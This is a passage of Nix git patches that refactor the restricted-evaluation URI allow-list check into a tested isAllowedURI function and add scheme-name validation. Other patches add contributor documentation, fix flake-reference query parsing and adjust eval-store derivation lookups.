return; - /* 'uri' should be equal to a prefix, or in a subdirectory of a prefix. Thus, the prefix https://github.co does not permit access to https://github.com. Note: this allows 'http://' and 'https://' as prefixes for any http/https URI. */ - for (auto & prefix : evalSettings.allowedUris.get()) + for (auto & prefix : allowedUris) { if (uri == prefix || (uri.size() > prefix.size() && prefix.size() > 0 && hasPrefix(uri, prefix) && (prefix[prefix.size() - 1] == '/' || uri[prefix.size()] == '/'))) - return; + return true; + } + + return false; +} + +void EvalState::checkURI(const std::string & uri) +{ + if (!evalSettings.restrictEval) return; + + if (isAllowedURI(uri, evalSettings.allowedUris.get())) return; /* If the URI is a path, then check it against allowedPaths as well. */ diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index f3f6d35b9..6008c3f60 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -837,6 +837,11 @@ std::string showType(const Value & v); */ SourcePath resolveExprPath(SourcePath path); +/** + * Whether a URI is allowed, assuming restrictEval is enabled + */ +bool isAllowedURI(std::string_view uri, const Strings & allowedPaths); + struct InvalidPathError : EvalError { Path path; diff --git a/tests/unit/libexpr/eval.cc b/tests/unit/libexpr/eval.cc new file mode 100644 index 000000000..cc5d6bbfa --- /dev/null +++ b/tests/unit/libexpr/eval.cc @@ -0,0 +1,106 @@ +#include +#include + +#include "eval.hh" +#include "tests/libexpr.hh" + +namespace nix { + +TEST(nix_isAllowedURI, http_example_com) { + Strings allowed; + allowed.push_back("http://example.com"); + + ASSERT_TRUE(isAllowedURI("http://example.com", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com/foo", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com/foo/", allowed)); + ASSERT_FALSE(isAllowedURI("/", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.co", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.como", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.org", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.org/foo", allowed)); +} + +TEST(nix_isAllowedURI, http_example_com_foo) { + Strings allowed; + allowed.push_back("http://example.com/foo"); + + ASSERT_TRUE(isAllowedURI("http://example.com/foo", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com/foo/", allowed)); + ASSERT_FALSE(isAllowedURI("/foo", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.como", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.org/foo", allowed)); + // Broken? + // ASSERT_TRUE(isAllowedURI("http://example.com/foo?ok=1", allowed)); +} + +TEST(nix_isAllowedURI, http) { + Strings allowed; + allowed.push_back("http://"); + + ASSERT_TRUE(isAllowedURI("http://", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com/foo", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com/foo/", allowed)); + ASSERT_TRUE(isAllowedURI("http://example.com", allowed)); + ASSERT_FALSE(isAllowedURI("/", allowed)); + ASSERT_FALSE(isAllowedURI("https://", allowed)); + ASSERT_FALSE(isAllowedURI("http:foo", allowed)); +} + +TEST(nix_isAllowedURI, https) { + Strings allowed; + allowed.push_back("https://"); + + ASSERT_TRUE(isAllowedURI("https://example.com", allowed)); + ASSERT_TRUE(isAllowedURI("https://example.com/foo", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com/https:", allowed)); +} + +TEST(nix_isAllowedURI, absolute_path) { + Strings allowed; + allowed.push_back("/var/evil"); // bad idea + + ASSERT_TRUE(isAllowedURI("/var/evil", allowed)); + ASSERT_TRUE(isAllowedURI("/var/evil/", allowed)); + ASSERT_TRUE(isAllowedURI("/var/evil/foo", allowed)); + ASSERT_TRUE(isAllowedURI("/var/evil/foo/", allowed)); + ASSERT_FALSE(isAllowedURI("/", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evi", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evilo", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evilo/", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evilo/foo", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com/var/evil", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com//var/evil", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com//var/evil/foo", allowed)); +} + +TEST(nix_isAllowedURI, file_url) { + Strings allowed; + allowed.push_back("file:///var/evil"); // bad idea + + ASSERT_TRUE(isAllowedURI("file:///var/evil", allowed)); + ASSERT_TRUE(isAllowedURI("file:///var/evil/", allowed)); + ASSERT_TRUE(isAllowedURI("file:///var/evil/foo", allowed)); + ASSERT_TRUE(isAllowedURI("file:///var/evil/foo/", allowed)); + ASSERT_FALSE(isAllowedURI("/", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evi", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evilo", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evilo/", allowed)); + ASSERT_FALSE(isAllowedURI("/var/evilo/foo", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com/var/evil", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com//var/evil", allowed)); + ASSERT_FALSE(isAllowedURI("http://example.com//var/evil/foo", allowed)); + ASSERT_FALSE(isAllowedURI("http://var/evil", allowed)); + ASSERT_FALSE(isAllowedURI("http:///var/evil", allowed)); + ASSERT_FALSE(isAllowedURI("http://var/evil/", allowed)); + ASSERT_FALSE(isAllowedURI("file:///var/evi", allowed)); + ASSERT_FALSE(isAllowedURI("file:///var/evilo", allowed)); + ASSERT_FALSE(isAllowedURI("file:///var/evilo/", allowed)); + ASSERT_FALSE(isAllowedURI("file:///var/evilo/foo", allowed)); + ASSERT_FALSE(isAllowedURI("file:///", allowed)); + ASSERT_FALSE(isAllowedURI("file://", allowed)); +} + +} // namespace nix \ No newline at end of file From 6cbba914a70eb5da6447fee5528a63723ed13245 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 6 Dec 2023 12:43:20 +0100 Subject: [PATCH 088/654] isAllowedURI: Remove incorrect note --- src/libexpr/eval.cc | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 0eb6f406e..d8a36fa02 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -603,8 +603,7 @@ bool isAllowedURI(std::string_view uri, const Strings & allowedUris) { /* 'uri' should be equal to a prefix, or in a subdirectory of a prefix. Thus, the prefix https://github.co does not permit - access to https://github.com. Note: this allows 'http://' and - 'https://' as prefixes for any http/https URI. */ + access to https://github.com. */ for (auto & prefix : allowedUris) { if (uri == prefix || (uri.size() > prefix.size() From 1fa958dda1ef0cb37441ef8d1a84faf6d501ac12 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 6 Dec 2023 14:08:22 +0100 Subject: [PATCH 089/654] isAllowedURI: Format --- src/libexpr/eval.cc | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index d8a36fa02..9e541f293 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -605,11 +605,14 @@ bool isAllowedURI(std::string_view uri, const Strings & allowedUris) prefix. Thus, the prefix https://github.co does not permit access to https://github.com. */ for (auto & prefix : allowedUris) { - if (uri == prefix || - (uri.size() > prefix.size() - && prefix.size() > 0 - && hasPrefix(uri, prefix) - && (prefix[prefix.size() - 1] == '/' || uri[prefix.size()] == '/'))) + if (uri == prefix + // Allow access to subdirectories of the prefix. + || (uri.size() > prefix.size() + && prefix.size() > 0 + && hasPrefix(uri, prefix) + && ( + prefix[prefix.size() - 1] == '/' + || uri[prefix.size()] == '/'))) return true; } From 79eb2920bb51c7ec9528a403986e79f04738e2be Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 6 Dec 2023 14:39:49 +0100 Subject: [PATCH 090/654] Add nix::isASCII*, locale-independent --- src/libutil/string.hh | 17 +++++++++++ tests/unit/libutil/string.cc | 59 ++++++++++++++++++++++++++++++++++++ 2 files changed, 76 insertions(+) create mode 100644 src/libutil/string.hh create mode 100644 tests/unit/libutil/string.cc diff --git a/src/libutil/string.hh b/src/libutil/string.hh new file mode 100644 index 000000000..16ef75643 --- /dev/null +++ b/src/libutil/string.hh @@ -0,0 +1,17 @@ +#pragma once + +namespace nix { + + /** Locale-independent version of std::islower(). */ + inline bool isASCIILower(char c) { return c >= 'a' && c <= 'z'; }; + + /** Locale-independent version of std::isupper(). */ + inline bool isASCIIUpper(char c) { return c >= 'A' && c <= 'Z'; }; + + /** Locale-independent version of std::isalpha(). */ + inline bool isASCIIAlpha(char c) { return isASCIILower(c) || isASCIIUpper(c); }; + + /** Locale-independent version of std::isdigit(). */ + inline bool isASCIIDigit(char c) { return c >= '0' && c <= '9'; }; + +} diff --git a/tests/unit/libutil/string.cc b/tests/unit/libutil/string.cc new file mode 100644 index 000000000..381f2cc15 --- /dev/null +++ b/tests/unit/libutil/string.cc @@ -0,0 +1,59 @@ +#include +#include "string.hh" + +namespace nix { + +TEST(string, isASCIILower) { + ASSERT_TRUE(isASCIILower('a')); + ASSERT_TRUE(isASCIILower('z')); + ASSERT_FALSE(isASCIILower('A')); + ASSERT_FALSE(isASCIILower('Z')); + ASSERT_FALSE(isASCIILower('0')); + ASSERT_FALSE(isASCIILower('9')); + ASSERT_FALSE(isASCIILower(' ')); + ASSERT_FALSE(isASCIILower('\n')); + ASSERT_FALSE(isASCIILower('\t')); + ASSERT_FALSE(isASCIILower(':')); +} + +TEST(string, isASCIIUpper) { + ASSERT_FALSE(isASCIIUpper('a')); + ASSERT_FALSE(isASCIIUpper('z')); + ASSERT_TRUE(isASCIIUpper('A')); + ASSERT_TRUE(isASCIIUpper('Z')); + ASSERT_FALSE(isASCIIUpper('0')); + ASSERT_FALSE(isASCIIUpper('9')); + ASSERT_FALSE(isASCIIUpper(' ')); + ASSERT_FALSE(isASCIIUpper('\n')); + ASSERT_FALSE(isASCIIUpper('\t')); + ASSERT_FALSE(isASCIIUpper(':')); +} + +TEST(string, isASCIIAlpha) { + ASSERT_TRUE(isASCIIAlpha('a')); + ASSERT_TRUE(isASCIIAlpha('z')); + ASSERT_TRUE(isASCIIAlpha('A')); + ASSERT_TRUE(isASCIIAlpha('Z')); + ASSERT_FALSE(isASCIIAlpha('0')); + ASSERT_FALSE(isASCIIAlpha('9')); + ASSERT_FALSE(isASCIIAlpha(' ')); + ASSERT_FALSE(isASCIIAlpha('\n')); + ASSERT_FALSE(isASCIIAlpha('\t')); + ASSERT_FALSE(isASCIIAlpha(':')); +} + +TEST(string, isASCIIDigit) { + ASSERT_FALSE(isASCIIDigit('a')); + ASSERT_FALSE(isASCIIDigit('z')); + ASSERT_FALSE(isASCIIDigit('A')); + ASSERT_FALSE(isASCIIDigit('Z')); + ASSERT_TRUE(isASCIIDigit('0')); + ASSERT_TRUE(isASCIIDigit('1')); + ASSERT_TRUE(isASCIIDigit('9')); + ASSERT_FALSE(isASCIIDigit(' ')); + ASSERT_FALSE(isASCIIDigit('\n')); + ASSERT_FALSE(isASCIIDigit('\t')); + ASSERT_FALSE(isASCIIDigit(':')); +} + +} \ No newline at end of file From d3a85b68347071d8d93ec796a38c707483d7b272 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 6 Dec 2023 15:14:41 +0100 Subject: [PATCH 091/654] isValidSchemeName: Add function --- src/libutil/url.cc | 17 +++++++++++++++++ src/libutil/url.hh | 9 +++++++++ tests/unit/libutil/url.cc | 18 ++++++++++++++++++ 3 files changed, 44 insertions(+) diff --git a/src/libutil/url.cc b/src/libutil/url.cc index 57b64d607..f2d5f1782 100644 --- a/src/libutil/url.cc +++ b/src/libutil/url.cc @@ -3,6 +3,7 @@ #include "util.hh" #include "split.hh" #include "canon-path.hh" +#include "string.hh" namespace nix { @@ -183,4 +184,20 @@ std::string fixGitURL(const std::string & url) } } +// https://www.rfc-editor.org/rfc/rfc3986#section-3.1 +bool isValidSchemeName(std::string_view s) +{ + if (s.empty()) return false; + if (!isASCIIAlpha(s[0])) return false; + for (auto c : s.substr(1)) { + if (isASCIIAlpha(c)) continue; + if (isASCIIDigit(c)) continue; + if (c == '+') continue; + if (c == '-') continue; + if (c == '.') continue; + return false; + } + return true; +} + } diff --git a/src/libutil/url.hh b/src/libutil/url.hh index 833f54678..24806bbff 100644 --- a/src/libutil/url.hh +++ b/src/libutil/url.hh @@ -55,4 +55,13 @@ ParsedUrlScheme parseUrlScheme(std::string_view scheme); changes absolute paths into file:// URLs. */ std::string fixGitURL(const std::string & url); +/** + * Whether a string is valid as RFC 3986 scheme name. + * Colon `:` is part of the URI; not the scheme name, and therefore rejected. + * See https://www.rfc-editor.org/rfc/rfc3986#section-3.1 + * + * Does not check whether the scheme is understood, as that's context-dependent. + */ +bool isValidSchemeName(std::string_view scheme); + } diff --git a/tests/unit/libutil/url.cc b/tests/unit/libutil/url.cc index a678dad20..09fa4e218 100644 --- a/tests/unit/libutil/url.cc +++ b/tests/unit/libutil/url.cc @@ -344,4 +344,22 @@ namespace nix { ASSERT_EQ(percentDecode(e), s); } +TEST(nix, isValidSchemeName) { + ASSERT_TRUE(isValidSchemeName("http")); + ASSERT_TRUE(isValidSchemeName("https")); + ASSERT_TRUE(isValidSchemeName("file")); + ASSERT_TRUE(isValidSchemeName("file+https")); + ASSERT_TRUE(isValidSchemeName("fi.le")); + ASSERT_TRUE(isValidSchemeName("file-ssh")); + ASSERT_TRUE(isValidSchemeName("file+")); + ASSERT_TRUE(isValidSchemeName("file.")); + ASSERT_TRUE(isValidSchemeName("file1")); + ASSERT_FALSE(isValidSchemeName("file:")); + ASSERT_FALSE(isValidSchemeName("file/")); + ASSERT_FALSE(isValidSchemeName("+file")); + ASSERT_FALSE(isValidSchemeName(".file")); + ASSERT_FALSE(isValidSchemeName("-file")); + ASSERT_FALSE(isValidSchemeName("1file")); +} + } From a05bc9eb92371af631fc9fb83c3595957fb56943 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 6 Dec 2023 15:27:29 +0100 Subject: [PATCH 092/654] allowed-uris: Match whole schemes also when scheme is not followed by slashes --- ...llowed-uris-can-now-match-whole-schemes.md | 7 ++++ src/libexpr/eval-settings.hh | 5 +++ src/libexpr/eval.cc | 17 ++++++++- tests/unit/libexpr/eval.cc | 35 +++++++++++++++++++ 4 files changed, 63 insertions(+), 1 deletion(-) create mode 100644 doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md diff --git a/doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md b/doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md new file mode 100644 index 000000000..3cf75a612 --- /dev/null +++ b/doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md @@ -0,0 +1,7 @@ +--- +synopsis: Option `allowed-uris` can now match whole schemes in URIs without slashes +prs: 9547 +--- + +If a scheme, such as `github:` is specified in the `allowed-uris` option, all URIs starting with `github:` are allowed. +Previously this only worked for schemes whose URIs used the `://` syntax. diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh index db2971acb..3009a462c 100644 --- a/src/libexpr/eval-settings.hh +++ b/src/libexpr/eval-settings.hh @@ -68,6 +68,11 @@ struct EvalSettings : Config evaluation mode. For example, when set to `https://github.com/NixOS`, builtin functions such as `fetchGit` are allowed to access `https://github.com/NixOS/patchelf.git`. + + Access is granted when + - the URI is equal to the prefix, + - or the URI is a subpath of the prefix, + - or the prefix is a URI scheme ended by a colon `:` and the URI has the same scheme. )"}; Setting traceFunctionCalls{this, false, "trace-function-calls", diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 9e541f293..1552e3e92 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -18,6 +18,7 @@ #include "memory-input-accessor.hh" #include "signals.hh" #include "gc-small-vector.hh" +#include "url.hh" #include #include @@ -599,6 +600,14 @@ void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & mkStorePathString(storePath, v); } +inline static bool isJustSchemePrefix(std::string_view prefix) +{ + return + !prefix.empty() + && prefix[prefix.size() - 1] == ':' + && isValidSchemeName(prefix.substr(0, prefix.size() - 1)); +} + bool isAllowedURI(std::string_view uri, const Strings & allowedUris) { /* 'uri' should be equal to a prefix, or in a subdirectory of a @@ -611,8 +620,14 @@ bool isAllowedURI(std::string_view uri, const Strings & allowedUris) && prefix.size() > 0 && hasPrefix(uri, prefix) && ( + // Allow access to subdirectories of the prefix. prefix[prefix.size() - 1] == '/' - || uri[prefix.size()] == '/'))) + || uri[prefix.size()] == '/' + + // Allow access to whole schemes + || isJustSchemePrefix(prefix) + ) + )) return true; } diff --git a/tests/unit/libexpr/eval.cc b/tests/unit/libexpr/eval.cc index cc5d6bbfa..93d3f658f 100644 --- a/tests/unit/libexpr/eval.cc +++ b/tests/unit/libexpr/eval.cc @@ -103,4 +103,39 @@ TEST(nix_isAllowedURI, file_url) { ASSERT_FALSE(isAllowedURI("file://", allowed)); } +TEST(nix_isAllowedURI, github_all) { + Strings allowed; + allowed.push_back("github:"); + ASSERT_TRUE(isAllowedURI("github:", allowed)); + ASSERT_TRUE(isAllowedURI("github:foo/bar", allowed)); + ASSERT_TRUE(isAllowedURI("github:foo/bar/feat-multi-bar", allowed)); + ASSERT_TRUE(isAllowedURI("github:foo/bar?ref=refs/heads/feat-multi-bar", allowed)); + ASSERT_TRUE(isAllowedURI("github://foo/bar", allowed)); + ASSERT_FALSE(isAllowedURI("https://github:443/foo/bar/archive/master.tar.gz", allowed)); + ASSERT_FALSE(isAllowedURI("file://github:foo/bar/archive/master.tar.gz", allowed)); + ASSERT_FALSE(isAllowedURI("file:///github:foo/bar/archive/master.tar.gz", allowed)); + ASSERT_FALSE(isAllowedURI("github", allowed)); +} + +TEST(nix_isAllowedURI, github_org) { + Strings allowed; + allowed.push_back("github:foo"); + ASSERT_FALSE(isAllowedURI("github:", allowed)); + ASSERT_TRUE(isAllowedURI("github:foo/bar", allowed)); + ASSERT_TRUE(isAllowedURI("github:foo/bar/feat-multi-bar", allowed)); + ASSERT_TRUE(isAllowedURI("github:foo/bar?ref=refs/heads/feat-multi-bar", allowed)); + ASSERT_FALSE(isAllowedURI("github://foo/bar", allowed)); + ASSERT_FALSE(isAllowedURI("https://github:443/foo/bar/archive/master.tar.gz", allowed)); + ASSERT_FALSE(isAllowedURI("file://github:foo/bar/archive/master.tar.gz", allowed)); + ASSERT_FALSE(isAllowedURI("file:///github:foo/bar/archive/master.tar.gz", allowed)); +} + +TEST(nix_isAllowedURI, non_scheme_colon) { + Strings allowed; + allowed.push_back("https://foo/bar:"); + ASSERT_TRUE(isAllowedURI("https://foo/bar:", allowed)); + ASSERT_TRUE(isAllowedURI("https://foo/bar:/baz", allowed)); + ASSERT_FALSE(isAllowedURI("https://foo/bar:baz", allowed)); +} + } // namespace nix \ No newline at end of file From 89cf53648ca98434a40b0c0cef51fa64f6e0fa37 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 12:26:31 +0100 Subject: [PATCH 093/654] Contributing branches and reverting (#9577) Co-authored-by: Valentin Gagarin --- doc/manual/src/contributing/hacking.md | 42 ++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 237eff925..4d3d66397 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -282,3 +282,45 @@ See also the [format documentation](https://github.com/haskell/cabal/blob/master Releases have a precomputed `rl-MAJOR.MINOR.md`, and no `rl-next.md`. Set `buildUnreleasedNotes = true;` in `flake.nix` to build the release notes on the fly. + +## Branches + +- [`master`](https://github.com/NixOS/nix/commits/master) + + The main development branch. All changes are approved and merged here. + When developing a change, create a branch based on the latest `master`. + + Maintainers try to [keep it in a release-worthy state](#reverting). + +- [`maintenance-*.*`](https://github.com/NixOS/nix/branches/all?query=maintenance) + + These branches are the subject of backports only, and are + also [kept](#reverting) in a release-worthy state. + + See [`maintainers/backporting.md`](https://github.com/NixOS/nix/blob/master/maintainers/backporting.md) + +- [`latest-release`](https://github.com/NixOS/nix/tree/latest-release) + + The latest patch release of the latest minor version. + + See [`maintainers/release-process.md`](https://github.com/NixOS/nix/blob/master/maintainers/release-process.md) + +- [`backport-*-to-*`](https://github.com/NixOS/nix/branches/all?query=backport) + + Generally branches created by the backport action. + + See [`maintainers/backporting.md`](https://github.com/NixOS/nix/blob/master/maintainers/backporting.md) + +- [_other_](https://github.com/NixOS/nix/branches/all) + + Branches that do not conform to the above patterns should be feature branches. + +## Reverting + +If a change turns out to be merged by mistake, or contain a regression, it may be reverted. +A revert is not a rejection of the contribution, but merely part of an effective development process. +It makes sure that development keeps running smoothly, with minimal uncertainty, and less overhead. +If maintainers have to worry too much about avoiding reverts, they would not be able to merge as much. +By embracing reverts as a good part of the development process, everyone wins. + +However, taking a step back may be frustrating, so maintainers will be extra supportive on the next try. From f45d2ee2b7090560fc30a227d638684268af700d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Fabian=20M=C3=B6ller?= Date: Mon, 11 Dec 2023 16:02:09 +0100 Subject: [PATCH 094/654] Fix query parsing for path-like flakes --- src/libexpr/flake/flakeref.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/flake/flakeref.cc b/src/libexpr/flake/flakeref.cc index 16f45ace7..8b0eb7460 100644 --- a/src/libexpr/flake/flakeref.cc +++ b/src/libexpr/flake/flakeref.cc @@ -90,7 +90,7 @@ std::pair parsePathFlakeRefWithFragment( fragment = percentDecode(url.substr(fragmentStart+1)); } if (pathEnd != std::string::npos && fragmentStart != std::string::npos) { - query = decodeQuery(url.substr(pathEnd+1, fragmentStart)); + query = decodeQuery(url.substr(pathEnd+1, fragmentStart-pathEnd-1)); } if (baseDir) { From 994f1b5c0de44319992ef6b1b106cee3fa400dc4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Fabian=20M=C3=B6ller?= Date: Mon, 11 Dec 2023 16:05:34 +0100 Subject: [PATCH 095/654] Add test cases for flake urls with fragments --- tests/functional/flakes/flakes.sh | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/tests/functional/flakes/flakes.sh b/tests/functional/flakes/flakes.sh index ccf1699f9..7506b6b3b 100644 --- a/tests/functional/flakes/flakes.sh +++ b/tests/functional/flakes/flakes.sh @@ -193,6 +193,14 @@ nix build -o "$TEST_ROOT/result" flake1 nix build -o "$TEST_ROOT/result" "$flake1Dir" nix build -o "$TEST_ROOT/result" "git+file://$flake1Dir" +# Test explicit packages.default. +nix build -o "$TEST_ROOT/result" "$flake1Dir#default" +nix build -o "$TEST_ROOT/result" "git+file://$flake1Dir#default" + +# Test explicit packages.default with query. +nix build -o "$TEST_ROOT/result" "$flake1Dir?ref=HEAD#default" +nix build -o "$TEST_ROOT/result" "git+file://$flake1Dir?ref=HEAD#default" + # Check that store symlinks inside a flake are not interpreted as flakes. nix build -o "$flake1Dir/result" "git+file://$flake1Dir" nix path-info "$flake1Dir/result" From 5f30c8acc7e0cad08924cc53e350e811d097fae7 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 10 Dec 2023 18:51:23 -0500 Subject: [PATCH 096/654] Give `Store::queryDerivationOutputMap` and `evalStore` argument Picking up where https://github.com/NixOS/nix/pull/9563 left off. --- src/libstore/store-api.cc | 4 ++-- src/libstore/store-api.hh | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 800df7fa0..7f35e74af 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -547,8 +547,8 @@ std::map> Store::queryPartialDerivationOut return outputs; } -OutputPathMap Store::queryDerivationOutputMap(const StorePath & path) { - auto resp = queryPartialDerivationOutputMap(path); +OutputPathMap Store::queryDerivationOutputMap(const StorePath & path, Store * evalStore) { + auto resp = queryPartialDerivationOutputMap(path, evalStore); OutputPathMap result; for (auto & [outName, optOutPath] : resp) { if (!optOutPath) diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index ada6699d5..13e5a1446 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -369,7 +369,7 @@ public: * Query the mapping outputName=>outputPath for the given derivation. * Assume every output has a mapping and throw an exception otherwise. */ - OutputPathMap queryDerivationOutputMap(const StorePath & path); + OutputPathMap queryDerivationOutputMap(const StorePath & path, Store * evalStore = nullptr); /** * Query the full store path given the hash part of a valid store From 9f39dda66ce0f92707d4be05d0a90961c78f8bd4 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 10 Dec 2023 21:21:21 -0500 Subject: [PATCH 097/654] Fix building CA derivations with and eval store I don't love the way this code looks. There are two larger problems: - eval, build/scratch, destination stores (#5025) should have different types to reflect the fact that they are used for different purposes and those purposes correspond to different operations. It should be impossible to "use the wrong store" in my cases. - Since drvs can end up in both the eval and build/scratch store, we should have some sort of union/layered store (not on the file sytem level, just conceptual level) that allows accessing both. This would get rid of the ugly "check both" boilerplate in this PR. Still, it might be better to land this now / soon after minimal cleanup, so we have a concrete idea of what problem better abstractions are supposed to solve. --- src/libstore/build/derivation-goal.cc | 51 +++++++++++++++++++++------ src/libstore/misc.cc | 9 +++-- src/libstore/store-api.hh | 3 +- src/nix-build/nix-build.cc | 6 ++-- tests/functional/ca/eval-store.sh | 10 ++++++ tests/functional/ca/local.mk | 1 + tests/functional/eval-store.sh | 16 +++++++-- 7 files changed, 76 insertions(+), 20 deletions(-) create mode 100644 tests/functional/ca/eval-store.sh diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc index d4da374ba..f8728ed4a 100644 --- a/src/libstore/build/derivation-goal.cc +++ b/src/libstore/build/derivation-goal.cc @@ -196,10 +196,19 @@ void DerivationGoal::loadDerivation() things being garbage collected while we're busy. */ worker.evalStore.addTempRoot(drvPath); - assert(worker.evalStore.isValidPath(drvPath)); + /* Get the derivation. It is probably in the eval store, but it might be inthe main store: - /* Get the derivation. */ - drv = std::make_unique(worker.evalStore.readDerivation(drvPath)); + - Resolved derivation are resolved against main store realisations, and so must be stored there. + + - Dynamic derivations are built, and so are found in the main store. + */ + for (auto * drvStore : { &worker.evalStore, &worker.store }) { + if (drvStore->isValidPath(drvPath)) { + drv = std::make_unique(drvStore->readDerivation(drvPath)); + break; + } + } + assert(drv); haveDerivation(); } @@ -401,11 +410,15 @@ void DerivationGoal::gaveUpOnSubstitution() } /* Copy the input sources from the eval store to the build - store. */ + store. + + Note that some inputs might not be in the eval store because they + are (resolved) derivation outputs in a resolved derivation. */ if (&worker.evalStore != &worker.store) { RealisedPath::Set inputSrcs; for (auto & i : drv->inputSrcs) - inputSrcs.insert(i); + if (worker.evalStore.isValidPath(i)) + inputSrcs.insert(i); copyClosure(worker.evalStore, worker.store, inputSrcs); } @@ -453,7 +466,7 @@ void DerivationGoal::repairClosure() std::map outputsToDrv; for (auto & i : inputClosure) if (i.isDerivation()) { - auto depOutputs = worker.store.queryPartialDerivationOutputMap(i); + auto depOutputs = worker.store.queryPartialDerivationOutputMap(i, &worker.evalStore); for (auto & j : depOutputs) if (j.second) outputsToDrv.insert_or_assign(*j.second, i); @@ -604,7 +617,13 @@ void DerivationGoal::inputsRealised() return *outPath; } else { - auto outMap = worker.evalStore.queryDerivationOutputMap(depDrvPath); + auto outMap = [&]{ + for (auto * drvStore : { &worker.evalStore, &worker.store }) + if (drvStore->isValidPath(depDrvPath)) + return worker.store.queryDerivationOutputMap(depDrvPath, drvStore); + assert(false); + }(); + auto outMapPath = outMap.find(outputName); if (outMapPath == outMap.end()) { throw Error( @@ -1085,8 +1104,12 @@ void DerivationGoal::resolvedFinished() auto newRealisation = realisation; newRealisation.id = DrvOutput { initialOutput->outputHash, outputName }; newRealisation.signatures.clear(); - if (!drv->type().isFixed()) - newRealisation.dependentRealisations = drvOutputReferences(worker.store, *drv, realisation.outPath); + if (!drv->type().isFixed()) { + auto & drvStore = worker.evalStore.isValidPath(drvPath) + ? worker.evalStore + : worker.store; + newRealisation.dependentRealisations = drvOutputReferences(worker.store, *drv, realisation.outPath, &drvStore); + } signRealisation(newRealisation); worker.store.registerDrvOutput(newRealisation); } @@ -1379,7 +1402,10 @@ std::map> DerivationGoal::queryPartialDeri res.insert_or_assign(name, output.path(worker.store, drv->name, name)); return res; } else { - return worker.store.queryPartialDerivationOutputMap(drvPath); + for (auto * drvStore : { &worker.evalStore, &worker.store }) + if (drvStore->isValidPath(drvPath)) + return worker.store.queryPartialDerivationOutputMap(drvPath, drvStore); + assert(false); } } @@ -1392,7 +1418,10 @@ OutputPathMap DerivationGoal::queryDerivationOutputMap() res.insert_or_assign(name, *output.second); return res; } else { - return worker.store.queryDerivationOutputMap(drvPath); + for (auto * drvStore : { &worker.evalStore, &worker.store }) + if (drvStore->isValidPath(drvPath)) + return worker.store.queryDerivationOutputMap(drvPath, drvStore); + assert(false); } } diff --git a/src/libstore/misc.cc b/src/libstore/misc.cc index 9f63fbbb5..cc8ad3d02 100644 --- a/src/libstore/misc.cc +++ b/src/libstore/misc.cc @@ -331,8 +331,11 @@ std::map drvOutputReferences( std::map drvOutputReferences( Store & store, const Derivation & drv, - const StorePath & outputPath) + const StorePath & outputPath, + Store * evalStore_) { + auto & evalStore = evalStore_ ? *evalStore_ : store; + std::set inputRealisations; std::function::ChildNode &)> accumRealisations; @@ -340,7 +343,7 @@ std::map drvOutputReferences( 